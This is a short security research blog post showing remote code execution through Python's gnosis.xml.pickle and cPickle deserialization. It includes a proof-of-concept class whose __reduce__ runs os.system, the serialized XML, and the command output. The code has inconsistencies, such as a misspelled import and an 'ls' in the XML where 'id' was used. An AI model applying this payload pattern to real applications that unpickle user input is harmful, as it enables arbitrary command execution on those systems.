Exploiting XML Serialization in Python

Java Vulnerabilities

Lately I have been really interested in XML serialization vulnerabilities. There has already been some eye opening research into the vulnerabilities that exist within implementations of Java:

• XStream “Remote Code Execution” exploit on code from “Standard way to serialize and deserialize Objects with XStream”
• More on XStream RCE: SpringMVC WS

A brief summary of the research above is there are serious issues with the blind serialization of XML documents into native objects. I also came across some research on vulnerabilities that exist with using Python’s Pickle module for object serialization.

So my thought was, “How can I combine the two, and are there any Python modules that assist with the serialization of XML to objects?”

I found what seems to be an outdated implementation of this in the Gnosis Utility package. gnosis.xml.pickle – Allows for XML Pickling of Python objects.

Exploitation

First we need to create something to “pickle” into an object:

import os

import cPickle

import gnosis.xml.pickel

class doShell(object):

def __reduce__(self):

return (os.system,('id',))

obj = cPickle.dumps(doShell())

This returns and stores our system command’s object representation. Now we can use Gnosis to load this:

xml = gnosis.xml.dumps(obj)

And the output looks something like this:

<?xml version="1.0"?>

<!DOCTYPE PyObject SYSTEM "PyObjects.dtd">

<PyObject family="obj" type="builtin_wrapper" class="_EmptyClass">

<attr name="__toplevel__" type="string" value="cposixnsystemnp1n(S'ls'np2ntp3nRp4n." />

</PyObject>

From here with simply use Gnosis to consume the XML and use Pickle to load our stored system command object:

result = gnosis.xml.pickle.loads(data)

cPickle.loads(result)

uid=501(rotlogix)…(truncated)

Considerations

One of the things I attempted to do is actually take the XML output and load it directly, but I ran into a lot of truncation issues with Pickle, which may or may not have to do with UTF-8.

Still gotta figure that one out… I think some applicable scenarios would be possibly dumping and loading user’s submitted data within a web application using both Pickle and Gnosis.

There weren’t many real world examples that I could find, but regardless you get the picture.

Protect Your Assets from Various Threat Actors

VerSprite’s Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies.

Our clients rely on VerSprite’s unique offerings of zero-day vulnerability research and exploit development to protect their assets from various threat actors.

From advanced technical security training to our research for hire B.O.S.S offering, we help organizations solve their most complex technical challenges. Learn more about Research as a Service →